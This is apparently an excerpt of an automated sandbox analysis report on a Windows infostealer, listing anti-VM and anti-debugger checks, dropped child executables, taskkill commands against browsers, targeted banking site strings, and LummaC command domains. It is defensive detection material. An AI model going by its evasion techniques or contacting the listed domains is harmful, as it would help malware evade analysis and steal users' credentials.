Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00F642DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: OLR88CERN7VQFRQ38J.exe, OLR88CERN7VQFRQ38J.exe, 00000003.00000002.2405341861.0000000000327000.00000040.00000001.01000000.00000006.sdmp, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2492334182.00000000008B6000.00000040.00000001.01000000.00000009.sdmp, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2551063753.0000000000BC8000.00000040.00000001.01000000.0000000B.sdmp, aae25c676b.exe, aae25c676b.exe, 00000009.00000002.2563291063.0000000001003000.00000040.00000001.01000000.0000000F.sdmp, 7d61336cf8.exe, 7d61336cf8.exe, 0000000A.00000002.2635121999.0000000000E06000.00000040.00000001.01000000.00000010.sdmp, aae25c676b.exe, 00000015.00000002.2721448202.0000000001003000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: aae25c676b.exe, 00000009.00000003.2562081008.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562260264.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562821885.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWFD
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562081008.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562574422.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000003.2562260264.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000009.00000002.2562821885.0000000000C3B000.00000004.00000020.00020000.00000000.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635976470.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849118022.000002EE4E220000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001A.00000002.2849118022.000002EE4E264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: firefox.exe, 0000001A.00000002.2852111919.000002EE582C2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2493072660.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: firefox.exe, 0000001A.00000002.2849118022.000002EE4E264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.0000000001783000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: aae25c676b.exe, 00000015.00000002.2730364070.000000000176B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: firefox.exe, 0000001A.00000002.2849118022.000002EE4E229000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.B
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware^)
Source: 7d61336cf8.exe, 0000000A.00000002.2635976470.000000000173E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: aae25c676b.exe, 00000015.00000002.2730364070.00000000017D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: OLR88CERN7VQFRQ38J.exe, 00000003.00000002.2405341861.0000000000327000.00000040.00000001.01000000.00000006.sdmp, ENORVNMU067PBMHUGECCERYC06W3ZY.exe, 00000004.00000002.2492334182.00000000008B6000.00000040.00000001.01000000.00000009.sdmp, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2551063753.0000000000BC8000.00000040.00000001.01000000.0000000B.sdmp, aae25c676b.exe, 00000009.00000002.2563291063.0000000001003000.00000040.00000001.01000000.0000000F.sdmp, 7d61336cf8.exe, 0000000A.00000002.2635121999.0000000000E06000.00000040.00000001.01000000.00000010.sdmp, aae25c676b.exe, 00000015.00000002.2721448202.0000000001003000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2202977062.00000000055EA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Code function: 3_2_04A006CE Start: 04A0077A End: 04A006F8 3_2_04A006CE
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Code function: 3_2_04A00E3E rdtsc 3_2_04A00E3E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Code function: 6_2_00BD287D LdrInitializeThunk, 6_2_00BD287D
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDEAA2 BlockInput, 12_2_00FDEAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00F92622
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_00F642DE
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F84CE8 mov eax, dword ptr fs:[00000030h] 12_2_00F84CE8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 12_2_00FC0B62
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\BF3BS0M5707K28RGW9.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00F92622
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00F8083F
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F809D5 SetUnhandledExceptionFilter, 12_2_00F809D5
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00F80C21
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: ENORVNMU067PBMHUGECCERYC06W3ZY.exe PID: 5636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7d61336cf8.exe PID: 1468, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000995001\num.exe, type: DROPPED
LummaC encrypted strings found
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: clearancek.site
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: licendfilteo.site
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: spirittunek.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bathdoomgaz.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: studennotediw.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dissapoiznw.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: eaglepawnoy.store
Source: file.exe, 00000000.00000003.2147367014.0000000004B00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: mobbipenju.store
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 12_2_00FC1201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FA2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 12_2_00FA2BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FCB226 SendInput,keybd_event, 12_2_00FCB226
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FE22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 12_2_00FE22DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\OLR88CERN7VQFRQ38J.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe "C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe "C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe "C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000995001\num.exe "C:\Users\user\AppData\Local\Temp\1000995001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 12_2_00FC0B62
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FC1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 12_2_00FC1663
Source: d7c50276ff.exe, 0000000C.00000000.2619556994.0000000001022000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: aae25c676b.exe, aae25c676b.exe, 00000009.00000002.2563481565.000000000104B000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: d7c50276ff.exe Binary or memory string: Shell_TrayWnd
Source: OLR88CERN7VQFRQ38J.exe, OLR88CERN7VQFRQ38J.exe, 00000003.00000002.2405341861.0000000000327000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: IsProgram Manager
Source: BF3BS0M5707K28RGW9.exe, BF3BS0M5707K28RGW9.exe, 00000006.00000002.2551307135.0000000000C0C000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: &Program Manager
Source: firefox.exe, 0000001A.00000002.2838376773.000000FE603FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 7d61336cf8.exe, 0000000A.00000002.2635121999.0000000000E06000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: E&Program Manager
Source: 7d61336cf8.exe Binary or memory string: E&Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00F80698 cpuid 12_2_00F80698
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ENORVNMU067PBMHUGECCERYC06W3ZY.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000992001\aae25c676b.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000993001\7d61336cf8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000995001\num.exe VolumeInformation Jump to behavior
